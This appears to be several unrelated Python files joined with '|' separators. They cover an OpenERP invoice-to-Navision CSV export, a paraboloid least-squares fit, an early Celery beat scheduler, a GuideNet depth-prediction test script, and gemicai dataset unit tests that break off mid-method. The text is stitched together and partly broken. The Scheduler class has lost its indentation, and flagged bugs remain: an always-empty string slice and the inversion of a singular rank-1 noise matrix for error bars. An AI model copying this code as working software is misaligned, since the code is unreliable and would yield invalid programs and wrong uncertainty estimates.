                                line['pay_to_contact'].encode('cp874'), #Address ERP
                                line['order_date'], #required gen date of erp
                                line['posting_date'],
                                line['payment_term_code'],
                                line['currency_code'], #NAV
                                line['price_include_vat'] or 'Yes', #NAV Vat Type (include,exclude) (Yes,No)
                                line['vendor_invoice_no'],
                                line['buy_from_contact'].encode('cp874'), #NAV
                                line['last_interfaced'], #Address ERP
                                line_no,
                                line['nav_type'],
                                line['account_no'], #Account No ERP
                                line['description'][0:50].encode('cp874'),
                                # NOTE(review): [50:0] is always '' - [50:100] was probably intended; confirm.
                                line['description2'][50:0].encode('cp874'),
                                line['quantity'],
                                line['direct_unit_cost'],
                                line['line_discount'],
                                line['gen_posting_group'] , #NAV Generate from Gen. Product Posting Group
                                line['vat_posting_group'] , #NAV
                                line['uom'],
                                line['wht_posting_group'] , #NAV
                                line['dimension_1'],
                                line['dimension_2'],
                                line['dimension_3'],
                                line['dimension_4'],
                                line['dimension_5'],
                                #line['dimension_6'],
                            ])
                        except Exception, err:
                            # Best effort: log the failing line and keep going.
                            self.log(cr, uid, line['invoice_id'], 'Export Error -> '+line['purchase_no']+":"+str(err))
                            pass
                    line_no += 1
                if config_obj:
                    cr.execute("update account_invoice set nav_exported = True where id = %s " % row)
                    #self.pool.get('purchase.order').write(cr, uid, [row], {'nav_exported': True})
        return True

    def schedule_export_customer_invoice(self, cr, uid, context=None):
        """Cron job: export each unexported customer invoice to
        "<config.path>SALESINV-<company>-<invoice id>.csv" and mark it exported."""
        purchase_export_sql = """
            select id from account_invoice
            where nav_exported = False and type = 'out_invoice' order by id
        """
        cr.execute(purchase_export_sql)
        export_ids = map(itemgetter(0), cr.fetchall())
        for row in export_ids:
            # Same shape as the supplier query, joined via sale_order instead
            # of purchase_order and with extra billing-cycle/product columns.
            purchase_line_sql = """
                select
                    account_invoice.company_id as company_id,
                    'Invoice' as document_type,
                    res_partner.nav_code_customer as buy_from_vendor_no,
                    account_invoice.origin as purchase_no,
                    res_partner.nav_code_customer as pay_to_vendor_no,
                    coalesce(res_partner_address.name,'') as pay_to_contact,
                    to_char(account_invoice.date_invoice, 'DD/MM/yyyy') as order_date,
                    to_char(account_invoice.date_invoice,'DD/MM/yyyy') as posting_date ,
                    account_payment_term.code_nav as payment_term_code, --payment_term (int)
                    '' as currency_code, --currency_id (int)
                    account_invoice.amount_total as price_include_vat,
                    '' as vendor_invoice_no,
                    coalesce(address2.name,'') as buy_from_contact,
                    to_char(now(), 'DD/MM/yyyy HH:mm') as last_interfaced,
                    'G/L Account' as nav_type,
                    account_account.code as account_no,
                    account_invoice_line.name as description,
                    '' as description2,
                    account_invoice_line.quantity as quantity,
                    account_invoice_line.price_unit as direct_unit_cost,
                    account_invoice_line.discount as line_discount,
                    post1.code_nav as gen_posting_group,
                    post2.code_nav as vat_posting_group,
                    '' as uom,
                    post3.code_nav as wht_posting_group,
                    d1.code as dimension_1,
                    d2.code as dimension_2,
                    d3.code as dimension_3,
                    d4.code as dimension_4,
                    d5.code as dimension_5,
                    d6.code as dimension_6,
                    account_invoice.name as contact_no,
                    account_invoice.id as invoice_id,
                    res_partner.taxcoding as taxcoding,
                    to_char(sale_order.date_period_start,'dd/mm/yyyy') || ' - ' || to_char(sale_order.date_period_finish,'dd/mm/yyyy') as cycle_name,
                    sale_order.date_period_finish - sale_order.date_period_start + 1 as cycle_day,
                    pcserv.name as service_category_name,
                    pcustomer.name as customer_product_name,
                    '' as customer_po
                from account_invoice_line
                join account_invoice on account_invoice_line.invoice_id = account_invoice.id
                left join res_partner_address on account_invoice.address_invoice_id = res_partner_address.id
                left join res_partner_address address2 on account_invoice.address_contact_id = address2.id
                left join account_account on account_invoice_line.account_id = account_account.id
                left join sale_order on sale_order.name = account_invoice.origin
                left join res_partner on account_invoice.partner_id = res_partner.id
                left join account_payment_term on account_invoice.payment_term = account_payment_term.id
                left join ineco_nav_postmaster post1 on res_partner.gen_bus_posting_group_id = post1.id
                left join ineco_nav_postmaster post2 on res_partner.vat_bus_posting_group_id = post2.id
                left join ineco_nav_postmaster post3 on res_partner.wht_bus_posting_group_id = post3.id
                left join ineco_nav_dimension d1 on sale_order.dimension_company = d1.id
                left join ineco_nav_dimension d2 on sale_order.dimension_department = d2.id
                left join ineco_nav_dimension d3 on sale_order.dimension_project = d3.id
                left join ineco_nav_dimension d4 on sale_order.dimension_product = d4.id
                left join ineco_nav_dimension d5 on sale_order.dimension_retailer = d5.id
                left join ineco_nav_dimension d6 on sale_order.dimension_customer = d6.id
                left join product_template pserv on sale_order.customer_product_id = pserv.id
                left join product_category pcserv on pserv.categ_id = pcserv.id
                left join product_template pcustomer on sale_order.customer_product_id = pcustomer.id
                where
                    account_invoice.type = 'out_invoice' --supplier invoice
                    and account_invoice.nav_exported = False
                    and account_invoice.id = %s
            """
            cr.execute(purchase_line_sql % row)
            line_data = cr.dictfetchall()
            if len(line_data):
                line_no = 1
                config_ids = self.pool.get('ineco.export.config').search(cr, uid, [('type','=','sale'),('company_id','=',line_data[0]['company_id'])])
                config_obj = self.pool.get('ineco.export.config').browse(cr, uid, config_ids)
                if config_obj:
                    config = config_obj[0]
                    path = config.path+"SALESINV-"+str(line_data[0]['company_id']) +"-"+str(row)+".csv"
                    #POP-001
                    f = open(path, 'wt')
                    #f = codecs.open(path, encoding='cp874', mode='w+')
                    writer = csv.writer(f)
                for line in line_data:
                    if config_obj:
                        writer = csv.writer(f, quoting=csv.QUOTE_NONNUMERIC)
                        try:
                            writer.writerow([
                                line['document_type'],
                                line['buy_from_vendor_no'].encode('cp874'), #NAV
                                line['purchase_no'],
                                line['pay_to_vendor_no'].encode('cp874'), #NAV
                                line['pay_to_contact'].encode('cp874') or '', #Address ERP
                                line['posting_date'], #ERP Generate Curredimension_6nt Date Post
                                line['payment_term_code'], #NAV
                                line['currency_code'], #NAV
                                'No' , #line['price_include_vat'], #Boolean Yes/No
                                'S001' , #Add Nav Sale ID
                                line['buy_from_contact'].encode('cp874'), #NAV
                                line['last_interfaced'], #Address ERP
                                line_no,
                                line['nav_type'],
                                line['account_no'], #Account No ERP
                                line['description'][0:50].encode('cp874'),
                                # NOTE(review): [50:0] is always '' (harmless here: description2 is '' in this query).
                                line['description2'][50:0].encode('cp874'),
                                line['quantity'],
                                line['uom'],
                                line['direct_unit_cost'],
                                line['line_discount'],
                                line['gen_posting_group'] or '', #NAV
                                line['vat_posting_group'] or '', #NAV REQUERY from master product
                                line['wht_posting_group'] or '', #NAV or '' (blank)
                                line['contact_no'] or '',
                                line['dimension_1'],
                                line['dimension_2'],
                                line['dimension_3'],
                                line['dimension_4'],
                                line['dimension_5'],
                                line['dimension_6'],
                                line['taxcoding'] or '',
                                line['service_category_name'][0:30].encode('cp874') or '',
                                line['cycle_name'] or '',
                                line['customer_product_name'][0:30].encode('cp874') or '',
                                line['cycle_day'],
                                line['customer_po'] or '',
                            ])
                        except Exception, err:
                            # Best effort: log the failing line and keep going.
                            self.log(cr, uid, line['invoice_id'], 'Export Error -> '+line['purchase_no']+":"+str(err))
                            pass
                    line_no += 1
                if config_obj:
                    cr.execute("update account_invoice set nav_exported = True where id = %s " % row)
                    #self.pool.get('purchase.order').write(cr, uid, [row], {'nav_exported': True})
        return True
account_invoice() |
import numpy as np
from matplotlib import pyplot as plt

# Best-fit parameters from a previous run, kept for reference:
#x0=-1.3604886221977293
#y0=58.22147608157934
#z0=-1512.8772100367873
#a=0.00016670445477401342

# Each row of dish_zenith.txt is an (x, y, z) point measured on the dish.
data=np.loadtxt('dish_zenith.txt')
x_data=data[:,0]
y_data=data[:,1]
z_data=data[:,2]

# Linear least-squares fit of a rotationally symmetric paraboloid written in
# a form that is linear in the coefficients:
#   z = c1 + c2*x + c3*y + c4*(x^2 + y^2)
# A: c1+c2*x+c3*x*x+c4*y+c5*y*y
A=np.zeros([len(x_data),4])
A[:,0]=1
A[:,1]=x_data
A[:,2]=y_data
A[:,3]=x_data*x_data+y_data*y_data
# Normal equations: coeff = (A^T A)^-1 (A^T z).
coeff=np.linalg.inv(A.T@A)@(A.T@z_data)

# Complete the square to recover z = z0 + a*((x-x0)^2 + (y-y0)^2).
a=coeff[3]
x0=-coeff[1]/(2*a)
y0=-coeff[2]/(2*a)
z0=coeff[0]-a*x0*x0-a*y0*y0

# Residuals: r1 from the paraboloid form, r from the linear model (equal up
# to rounding); the scatter of r estimates the per-point noise.
r1=z_data-z0-a*((x_data-x0)**2+(y_data-y0)**2)
r=z_data-A@coeff
rms=np.std(r)
print('The rms error is ',rms)

# NOTE(review): np.outer(r, r) is a rank-1 matrix, so inverting it is
# ill-defined - a diagonal noise matrix (e.g. np.diag(r**2) or rms**2 * I)
# was probably intended; confirm before trusting these error bars.
N=np.outer(r,r)
error=np.linalg.inv(A.T@(np.linalg.inv(N)@A))
err,v=np.linalg.eig(error)
print('coeff is ',coeff)
print('error is ',err)
print('error of a is ',err[3])

# Plot residuals against the fitted paraboloid height.
plt.ion()
plt.plot(a*((x_data-x0)**2+(y_data-y0)**2),r,'.')
plt.show()
|
import time
import shelve
import atexit
import threading
from UserDict import UserDict
from datetime import datetime
from celery import conf
from celery import registry
from celery.log import setup_logger
from celery.exceptions import NotRegistered
class SchedulingError(Exception):
    """An error occurred while scheduling a task."""
class ScheduleEntry(object):
    """One schedulable entry tracked by the scheduler.

    :param name: Name of the task.
    :keyword last_run_at: When this task last ran (defaults to now).
    :keyword total_run_count: How many times the task has run (defaults to 0).
    """

    def __init__(self, name, last_run_at=None,
                 total_run_count=None):
        self.name = name
        if not last_run_at:
            last_run_at = datetime.now()
        self.last_run_at = last_run_at
        if not total_run_count:
            total_run_count = 0
        self.total_run_count = total_run_count

    def next(self):
        """Return the successor entry: timestamped now, run count bumped by one."""
        return self.__class__(self.name, datetime.now(),
                              self.total_run_count + 1)

    def is_due(self, task):
        """Delegate the due-check to *task*, passing our last run time."""
        return task.is_due(self.last_run_at)
class Scheduler(UserDict):
"""Scheduler for periodic tasks.
:keyword registry: The task registry to use.
:keyword schedule: The schedule dictionary. Default is the global
persistent schedule ``celery.beat.schedule``.
"""
interval = 1
def __init__(self, **kwargs):
def _get_default_logger():
import multiprocessing
return multiprocessing.get_logger()
attr_defaults = {"registry": lambda: {},
"schedule": lambda: {},
"interval": lambda: self.interval,
"logger": _get_default_logger}
for attr_name, attr_default_gen in attr_defaults.items():
if attr_name in kwargs:
attr_value = kwargs[attr_name]
else:
attr_value = attr_default_gen()
setattr(self, attr_name, attr_value)
self.cleanup()
self.schedule_registry()
def tick(self):
"""Run a tick, that is one iteration of the scheduler.
Executes all due tasks."""
for entry in self.get_due_tasks():
self.logger.debug("Scheduler: Sending due task %s" % (
entry.name))
result = self.apply_async(entry)
self.logger.debug("Scheduler: %s sent. id->%s" % (
entry.name, result.task_id))
def get_due_tasks(self):
"""Get all the schedule entries that are due to execution."""
return filter(self.is_due, self.schedule.values())
def get_task(self, name):
try:
return self.registry[name]
except KeyError:
raise NotRegistered(name)
def is_due(self, entry):
return entry.is_due(self.get_task(entry.name))
def apply_async(self, entry):
# Update timestamps and run counts before we actually execute,
# so we have that done if an exception is raised (doesn't schedule
# forever.)
entry = self.schedule[entry.name] = entry.next()
task = self.get_task(entry.name)
try:
result = task.apply_async()
except Exception, exc:
raise SchedulingError(
"Couldn't apply scheduled task %s: %s" % (
task.name, exc))
return result
def schedule_registry(self):
"""Add the current contents of the registry to the schedule."""
periodic_tasks = self.registry.get_all_periodic()
for name, task in self.registry.get_all_periodic().items():
if name not in self.schedule:
self.logger.debug(
"Scheduler: Adding periodic task %s to schedule" % (
task.name))
self.schedule.setdefault(name, ScheduleEntry(task.name))
def cleanup(self):
for task_name, entry in self.schedule.items():
if task_name not in self.registry:
self.schedule.pop(task_name, None)
@property
def schedule(self):
return self.data
class ClockService(object):
    """Drives a Scheduler in a loop, persisting its schedule via shelve."""
    scheduler_cls = Scheduler
    schedule_filename = conf.CELERYBEAT_SCHEDULE_FILENAME
    registry = registry.tasks

    def __init__(self, logger=None, is_detached=False):
        # NOTE(review): is_detached is accepted but never used here - confirm
        # whether callers rely on it.
        self.logger = logger
        self._shutdown = threading.Event()   # set by stop() to request exit
        self._stopped = threading.Event()    # set once shutdown has completed

    def start(self):
        """Run the tick loop until stop() is called or the process is interrupted."""
        self.logger.info("ClockService: Starting...")
        # Persistent schedule backed by a shelve file on disk.
        schedule = shelve.open(filename=self.schedule_filename)
        #atexit.register(schedule.close)
        scheduler = self.scheduler_cls(schedule=schedule,
                                       registry=self.registry,
                                       logger=self.logger)
        self.logger.debug(
            "ClockService: Ticking with interval->%d, schedule->%s" % (
                scheduler.interval, self.schedule_filename))

        # Mutable flag shared with the closure below: guards against syncing
        # and closing the shelve twice (both except and finally call _stop()).
        synced = [False]

        def _stop():
            if not synced[0]:
                self.logger.debug("ClockService: Syncing schedule to disk...")
                schedule.sync()
                schedule.close()
                synced[0] = True
                self._stopped.set()

        try:
            while True:
                if self._shutdown.isSet():
                    break
                scheduler.tick()
                time.sleep(scheduler.interval)
        except (KeyboardInterrupt, SystemExit):
            _stop()
        finally:
            _stop()

    def stop(self, wait=False):
        """Request shutdown; with wait=True, block until the loop has exited."""
        self._shutdown.set()
        wait and self._stopped.wait()  # block until shutdown done.
class ClockServiceThread(threading.Thread):
    """Runs a ClockService in a daemon background thread."""

    def __init__(self, *args, **kwargs):
        threading.Thread.__init__(self)
        self.setDaemon(True)
        # All constructor arguments are forwarded to the wrapped service.
        self.clockservice = ClockService(*args, **kwargs)

    def run(self):
        self.clockservice.start()

    def stop(self):
        # Blocks until the service has fully shut down.
        self.clockservice.stop(wait=True)
|
from .code_climate_formatter import CodeClimateFormatter
from .html_report_formatter import HTMLReportFormatter
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# @Filename: test.py
# @Project: GuideNet
# @Author: jie
# @Time: 2021/3/16 4:47 PM
import os
os.environ["CUDA_VISIBLE_DEVICES"] = '0'
import torch
import yaml
from easydict import EasyDict as edict
import datasets
import encoding
def test():
    """Run inference over the test loader and save predicted depth maps.

    When config.tta is set, applies horizontal-flip test-time
    augmentation: the batch and its mirror are predicted together and
    the two predictions are averaged.
    """
    net.eval()
    for _batch, (rgb, lidar, _, idx, ori_size) in enumerate(testloader):
        with torch.no_grad():
            if config.tta:
                # Stack the inputs with their horizontal mirrors.
                rgb_both = torch.cat([rgb, torch.flip(rgb, [-1])], 0).cuda()
                lidar_both = torch.cat([lidar, torch.flip(lidar, [-1])], 0).cuda()
                preds, = net(rgb_both, lidar_both)
                plain, mirrored = preds.split(preds.shape[0] // 2)
                # Un-mirror the second half and average the two passes.
                depth_pred = (plain + torch.flip(mirrored, [-1])) / 2.
            else:
                depth_pred, = net(rgb.cuda(), lidar.cuda())
            depth_pred[depth_pred < 0] = 0  # clamp negative depths
            depth_pred = depth_pred.cpu().squeeze(1).numpy()
            idx = idx.cpu().squeeze(1).numpy()
            ori_size = ori_size.cpu().numpy()
            name = [testset.names[i] for i in idx]
            save_result(config, depth_pred, name, ori_size)
if __name__ == '__main__':
    # config_name = 'GN.yaml'
    config_name = 'GNS.yaml'
    # Load the experiment configuration and expose it with attribute access.
    with open(os.path.join('configs', config_name), 'r') as file:
        config_data = yaml.load(file, Loader=yaml.FullLoader)
        config = edict(config_data)
    # NOTE(review): star-import deliberately placed after the config is
    # loaded — confirm utils has no import-time dependency on it.
    from utils import *
    transform = init_aug(config.test_aug_configs)
    # data_config is expected to hold a single dataset-name -> kwargs entry.
    key, params = config.data_config.popitem()
    dataset = getattr(datasets, key)
    testset = dataset(**params, mode='test', transform=transform, return_idx=True, return_size=True)
    testloader = torch.utils.data.DataLoader(testset, batch_size=config.batch_size, num_workers=config.num_workers,
                                             shuffle=False, pin_memory=True)
    print('num_test = {}'.format(len(testset)))
    net = init_net(config)
    torch.cuda.empty_cache()
    # Let cuDNN autotune kernels (assumes reasonably fixed input sizes).
    torch.backends.cudnn.benchmark = True
    net.cuda()
    net = encoding.parallel.DataParallelModel(net)
    net = resume_state(config, net)
    test()
|
import os
import gemicai.data_iterators as test
import torchvision
import unittest
# Test fixtures: a directory of raw (gzipped) DICOM files, one such file,
# a gemset file used where a DICOM path is expected (wrong type), and a
# directory of pickled gemset datasets plus one dataset inside it.
raw_dicom_directory = os.path.join("..", "examples", "dicom", "CT")
raw_dicom_file_path = os.path.join(raw_dicom_directory, "325261597578315993471860132776680.dcm.gz")
wrong_dicom_file_path = os.path.join("..", "000001.gemset")
dicom_directory = os.path.join("..", "examples", "gemset", "CT")
dicom_data_set = os.path.join(dicom_directory, "000001.gemset")
class TestPickledDicomoDataSet(unittest.TestCase):
    """Tests for PickledDicomoDataSet: constructor validation, iteration,
    subsetting and summarizing of a single pickled gemset file."""

    def test_init_correct_usage(self):
        dataset = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
        self.assertIsInstance(dataset, test.PickledDicomoDataSet)

    def test_init_wrong_label_counter_type(self):
        with self.assertRaises(TypeError):
            test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={},
                                      label_counter_type=TestPickledDicomoDataSet)

    def test_init_invalid_file_path(self):
        with self.assertRaises(FileNotFoundError):
            test.PickledDicomoDataSet(wrong_dicom_file_path, ["CT"], constraints={})

    def test_init_file_has_wrong_type(self):
        # Construction is lazy: the unpickling error surfaces on first read.
        dataset = test.PickledDicomoDataSet(raw_dicom_file_path, ["CT"], constraints={})
        with self.assertRaises(test.gem.pickle.UnpicklingError):
            next(iter(dataset))

    def test_init_wrong_labels_type(self):
        with self.assertRaises(TypeError):
            dataset = test.PickledDicomoDataSet(dicom_data_set, {"CT"}, constraints={})

    def test_init_wrong_constraints_type(self):
        with self.assertRaises(TypeError):
            dataset = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints=[])

    def test_iter(self):
        dataset = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
        dataset = iter(dataset)
        self.assertIsInstance(dataset, test.PickledDicomoDataSet)

    def test_next(self):
        dataset = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
        data = next(iter(dataset))
        self.assertIsInstance(data, list)

    def test_len(self):
        # len() reports how many entries have been consumed so far, not the total.
        dataset = iter(test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={}))
        self.assertEqual(len(dataset), 0)
        next(dataset)
        self.assertEqual(len(dataset), 1)
        next(dataset)
        next(dataset)
        self.assertEqual(len(dataset), 3)

    def test_from_file_apply_invalid_transformation(self):
        with self.assertRaises(Exception):
            next(iter(test.PickledDicomoDataSet(dicom_data_set, ["CT"], transform=[], constraints={})))

    def test_from_file_apply_valid_transformation(self):
        t1 = torchvision.transforms.Compose([
            torchvision.transforms.ToPILImage(),
            torchvision.transforms.Resize((244, 244)),
            torchvision.transforms.ToTensor()
        ])
        data = next(iter(test.PickledDicomoDataSet(dicom_data_set, ["CT"], transform=t1, constraints={})))
        self.assertIsInstance(data, list)

    def test_subset_correct_usage(self):
        # A constraint that matches nothing yields an immediately exhausted subset.
        data = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
        subset = data.subset({"Modality": "asd"})
        with self.assertRaises(StopIteration):
            next(iter(subset))

    def test_subset_wrong_constraint_type(self):
        data = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
        with self.assertRaises(TypeError):
            subset = data.subset(("Modality", 1))

    def test_can_be_parallelized(self):
        data = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
        self.assertEqual(data.can_be_parallelized(), False)

    def test_classes_correct_usage(self):
        data = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
        self.assertIsInstance(data.classes("Modality"), list)

    def test_classes_wrong_label_type(self):
        data = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
        with self.assertRaises(TypeError):
            data.classes(["Modality"])

    def test_summarize_correct_usage(self):
        data = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
        self.assertIsInstance(data.summarize("Modality", print_summary=False), test.gem.LabelCounter)

    def test_summarize_wrong_label_type(self):
        data = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
        with self.assertRaises(TypeError):
            data.summarize(["Modality"], print_summary=False)

    def test_summarize_wrong_constraints_type(self):
        data = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
        with self.assertRaises(TypeError):
            data.summarize("Modality", [], print_summary=False)

    def test_summarize_test_CT_constraint(self):
        # Summaries over two different labels must differ for this fixture.
        data = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
        summary_1 = data.summarize("Modality", print_summary=False)
        summary_2 = data.summarize("BodyPartExamined", print_summary=False)
        self.assertNotEqual(str(summary_1), str(summary_2))

    def test_summarize_wrong_summary_type(self):
        data = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
        with self.assertRaises(TypeError):
            data.summarize("Modality", print_summary=None)
class TestPickledDicomoDataFolder(unittest.TestCase):
    """Tests for PickledDicomoDataFolder: a dataset spanning every gemset
    file inside a directory."""

    def test_init_correct_usage(self):
        dataset = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
        self.assertIsInstance(dataset, test.PickledDicomoDataFolder)

    def test_init_wrong_label_counter_type(self):
        with self.assertRaises(TypeError):
            test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={},
                                         label_counter_type=TestPickledDicomoDataSet)

    def test_init_invalid_directory_path(self):
        with self.assertRaises(NotADirectoryError):
            test.PickledDicomoDataFolder(os.path.join(dicom_directory, "asd"), ["CT"], constraints={})

    def test_init_file_has_wrong_type(self):
        # Construction is lazy: the unpickling error surfaces on first read.
        dataset = test.PickledDicomoDataFolder(raw_dicom_directory, ["CT"], constraints={})
        with self.assertRaises(test.gem.pickle.UnpicklingError):
            next(iter(dataset))

    def test_init_wrong_labels_type(self):
        with self.assertRaises(TypeError):
            dataset = test.PickledDicomoDataFolder(dicom_directory, {"CT"}, constraints={})

    def test_init_wrong_constraints_type(self):
        with self.assertRaises(TypeError):
            dataset = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints=[])

    def test_iter(self):
        dataset = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
        dataset = iter(dataset)
        self.assertIsInstance(dataset, test.PickledDicomoDataFolder)

    def test_next(self):
        dataset = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
        data = next(iter(dataset))
        self.assertIsInstance(data, list)

    def test_len(self):
        # len() reports how many entries have been consumed so far, not the total.
        dataset = iter(test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={}))
        self.assertEqual(len(dataset), 0)
        next(dataset)
        self.assertEqual(len(dataset), 1)
        next(dataset)
        next(dataset)
        self.assertEqual(len(dataset), 3)

    def test_subset_correct_usage(self):
        data = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
        subset = data.subset({"Modality": "asd"})
        with self.assertRaises(StopIteration):
            next(iter(subset))

    def test_subset_wrong_constraint_type(self):
        data = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
        with self.assertRaises(TypeError):
            subset = data.subset(("Modality", 1))

    def test_iterate_over_all(self):
        # Exhausting the folder dataset should yield exactly 49 entries.
        data = iter(test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={}))
        with self.assertRaises(StopIteration):
            while True:
                next(data)
        self.assertEqual(len(data), 49)

    def test_can_be_parallelized(self):
        data = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
        self.assertEqual(data.can_be_parallelized(), False)

    def test_classes_correct_usage(self):
        data = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
        self.assertIsInstance(data.classes("Modality"), list)

    def test_classes_wrong_label_type(self):
        data = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
        with self.assertRaises(TypeError):
            data.classes(["Modality"])

    def test_summarize_correct_usage(self):
        data = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
        self.assertIsInstance(data.summarize("Modality", print_summary=False), test.gem.LabelCounter)

    def test_summarize_wrong_label_type(self):
        data = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
        with self.assertRaises(TypeError):
            data.summarize(["Modality"], print_summary=False)

    def test_summarize_wrong_constraints_type(self):
        data = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
        with self.assertRaises(TypeError):
            data.summarize("Modality", [], print_summary=False)

    def test_summarize_test_CT_constraint(self):
        data = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
        summary_1 = data.summarize("Modality", print_summary=False)
        summary_2 = data.summarize("BodyPartExamined", print_summary=False)
        self.assertNotEqual(str(summary_1), str(summary_2))

    def test_summarize_wrong_summary_type(self):
        data = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
        with self.assertRaises(TypeError):
            data.summarize("Modality", print_summary=None)
class TestPickledDicomoFilePool(unittest.TestCase):
    """Tests for PickledDicomoFilePool: a dataset built from an explicit
    list of gemset file paths."""

    def test_init_correct_usage(self):
        data = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
        self.assertIsInstance(data, test.PickledDicomoFilePool)

    def test_init_wrong_label_counter_type(self):
        with self.assertRaises(TypeError):
            test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={},
                                       label_counter_type=TestPickledDicomoDataSet)

    def test_init_invalid_file_pool_path(self):
        with self.assertRaises(FileNotFoundError):
            test.PickledDicomoFilePool([os.path.join(dicom_directory, "asd", "000001.gemset")], ["CT"], constraints={})

    def test_init_file_has_wrong_type(self):
        # Construction is lazy: the unpickling error surfaces on first read.
        with self.assertRaises(test.gem.pickle.UnpicklingError):
            next(iter(test.PickledDicomoFilePool([raw_dicom_file_path], ["CT"], constraints={})))

    def test_init_wrong_labels_type(self):
        with self.assertRaises(TypeError):
            dataset = test.PickledDicomoFilePool([dicom_data_set], {"CT"}, constraints={})

    def test_init_wrong_constraints_type(self):
        with self.assertRaises(TypeError):
            dataset = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints=[])

    def test_iter(self):
        dataset = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
        dataset = iter(dataset)
        self.assertIsInstance(dataset, test.PickledDicomoFilePool)

    def test_next(self):
        dataset = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
        data = next(iter(dataset))
        self.assertIsInstance(data, list)

    def test_len(self):
        # len() reports how many entries have been consumed so far, not the total.
        dataset = iter(test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={}))
        self.assertEqual(len(dataset), 0)
        next(dataset)
        self.assertEqual(len(dataset), 1)
        next(dataset)
        next(dataset)
        self.assertEqual(len(dataset), 3)

    def test_subset_correct_usage(self):
        data = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
        subset = data.subset({"Modality": "asd"})
        with self.assertRaises(StopIteration):
            next(iter(subset))

    def test_subset_wrong_constraint_type(self):
        data = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
        with self.assertRaises(TypeError):
            subset = data.subset(("Modality", 1))

    def test_iterate_over_all(self):
        data = iter(test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={}))
        with self.assertRaises(StopIteration):
            while True:
                next(data)
        self.assertNotEqual(len(data), 0)

    def test_can_be_parallelized(self):
        data = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
        self.assertEqual(data.can_be_parallelized(), False)

    def test_classes_correct_usage(self):
        data = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
        self.assertIsInstance(data.classes("Modality"), list)

    def test_classes_wrong_label_type(self):
        data = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
        with self.assertRaises(TypeError):
            data.classes(["Modality"])

    def test_summarize_correct_usage(self):
        data = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
        self.assertIsInstance(data.summarize("Modality", print_summary=False), test.gem.LabelCounter)

    def test_summarize_wrong_label_type(self):
        data = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
        with self.assertRaises(TypeError):
            data.summarize(["Modality"], print_summary=False)

    def test_summarize_wrong_constraints_type(self):
        data = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
        with self.assertRaises(TypeError):
            data.summarize("Modality", [], print_summary=False)

    def test_summarize_test_CT_constraint(self):
        data = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
        summary_1 = data.summarize("Modality", print_summary=False)
        summary_2 = data.summarize("BodyPartExamined", print_summary=False)
        self.assertNotEqual(str(summary_1), str(summary_2))

    def test_summarize_wrong_summary_type(self):
        data = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
        with self.assertRaises(TypeError):
            data.summarize("Modality", print_summary=None)
class TestConcurrentPickledDicomObjectTaskSplitter(unittest.TestCase):
    """Tests for ConcurrentPickledDicomObjectTaskSplitter: a parallelizable
    wrapper whose iterator hands out PickledDicomoFilePool workers."""

    def test_init_correct_usage(self):
        data = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
        self.assertIsInstance(data, test.ConcurrentPickledDicomObjectTaskSplitter)

    def test_init_wrong_label_counter_type(self):
        with self.assertRaises(TypeError):
            test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={},
                                                          label_counter_type=TestPickledDicomoDataSet)

    def test_init_invalid_directory_path(self):
        # NOTE(review): unlike the other classes, this constructor apparently
        # does not validate the path eagerly — there is no assertRaises here;
        # confirm whether that is intended.
        test.ConcurrentPickledDicomObjectTaskSplitter(os.path.join(dicom_directory, "asd"), ["CT"], constraints={})

    def test_init_wrong_labels_type(self):
        with self.assertRaises(TypeError):
